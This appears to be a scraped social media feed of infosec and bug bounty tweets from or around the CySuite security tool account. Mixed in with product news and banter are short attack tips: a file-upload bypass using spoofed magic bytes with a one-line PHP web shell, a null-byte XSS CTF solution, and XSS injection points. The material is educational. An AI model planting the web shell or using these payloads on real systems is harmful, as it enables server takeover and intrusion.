CySuite

CySuite has a new landing page redesign! Join the waitlist today to get early access to the beta version of CySuite. In the beta version, you can link your GitHub repository and visualize a code property graph of the syntax, call stack, and dependencies of your Python program.

Landing page redesign! The homepage has been redesigned to better explain the three main features of CySuite and how it can help your company. We are still in the early stages and would love your feedback. Visit the website at cysuite.herokuapp.com

@_JohnHammond 😂😂😂 right click, save as PNG

oh gawd no what have i done

@an0nud4y @harshbothra_ @remonsec @Farah_Hawaa @theXSSrat @InsiderPhD @rbhichher @RogueSMG @joehelle @_JohnHammond @ADITYASHENDE17 @thecybermentor @cyph3r_asr Joplin is a nice shout

Hey #infosec mentors , What note Taking Apps will you recommend to keep track of things during Learning?? If there is any ?? @harshbothra_ @remonsec @Farah_Hawaa @theXSSrat @InsiderPhD @rbhichher @RogueSMG @joehelle @_JohnHammond @ADITYASHENDE17 @thecybermentor @cyph3r_asr

Would you prefer: A: Access to an API that queries for subdomains, directories and parameters (to integrate to your workflow) B: A local software that lets you scan web targets for subdomains, directories and parameters manually (like Burp) #infosec #BugBounty #CyberSecurity

Hackers, what's a problem that you wish a program could solve? simple, complex, niche - doesn't matter. Looking for something to code tonight 😎🤙

Just landed in Berlin.

What comes first when you put the letter 'G' in the search bar.

@luoy85 Do you mean encoding the payload into the image? @luoy85

@CySuite_ 这个方式我做了很多测试，成功率并不高，需要编码后成功率才会提高

File Upload techniques: 1. Change magic bytes (used to identify file): PNG: 89 50 4E 47 0D 0A 1A 0A Zip File: 50 4B 03 04 JPEG: FF D8 FF EE BMP: 42 4D 2. Send payload (Injected using BurpSuite) <?php system($_GET['cmd']); ?> Follow for more #infosec updates and #bugbountytips

Eyeopening keynote by @mdowd for those who’ve been ignoring the trends past decade. data-only, crypto and web attacks are taking over mem corruption bugs in multiple domains. Nowadays your offensive team is like a car with 3 wheels if it lacks web or crypto experts.

@AccidentalCISO Why hasn't anyone ever thought of that? 👀

So, we all just share one account. It’s more secure because it reduces our risk surface.

Here are some labs to practice your #CyberSecurity skills categorized by bug type: [XSS] prompt.ml xss-game.appspot.com alf.nu/alert1 sudo.co.il/xss/ polyglot.innerht.ml hack.me/t/XSS #infosec #BugBounty #bugbountytip

PHP drops any header if it finds nullbyte value in the header. If user controls input in header, they can chose to drop the header. This works on PHP since 2015 but will be fixed on next version. #BugBounty Solution for my CTF: %00<img src=x onerror=alert(1337)>

This is a really good challenge for beginners. It won't take 30 minutes of your time, and it will increase your problem solving skills. Plus, there are no ranking or timers. Enjoy and good luck!

Google CTF Beginners Quest 2021 is on! capturetheflag.withgoogle.com/beginners-quest?!:) Go! Now! You have the fate of the world in your hands!

Bug Bounty Tip Where to inject javascript:alert(1) 🔹 <a href=[xss]> 🔹 <iframe src=[xss]> 🔹 <form action=[xss]> 🔹 <form><button formaction=[xss]> Firefox Only 🔸 <embed src=[xss]> #BugBounty #bugbountytip #infosec #CyberSecurity #cybersecuritytips #Hacking #hacker #hack

Anyone doing the same? :D @nixcraft

@naglinagli @Hacker0x01 Congratulations! Do you have some tips for people who just got their first bounty?

Happy to sneak into the Top 10 on the 90 days leaderboard at @Hacker0x01, 0 VDP reputation involved - result of hard work and many invested hours. Today marks exactly 11 month since my first bounty. #BugBounty

However, adding the Authorization Header to the 403 Forbidden status code won't change the response, because the server understands the request but refuses to authorize it. For example, sending a payload continuously to a server can lead to your IP getting forbidden. #infosec

Quick #bugbountytip: The 401 and 403 status codes are two different things. As per the RFC standard, the 401 Unauthorized header indicates that the request has not been applied because it lacks valid credentials for the target resource. Adding an Authorization Header fixes it.

Your subdomain enumeration scan has just finished and you see two outputs. The first has 200 OK and the other has 401 Unauthorized. Which one do you go for first?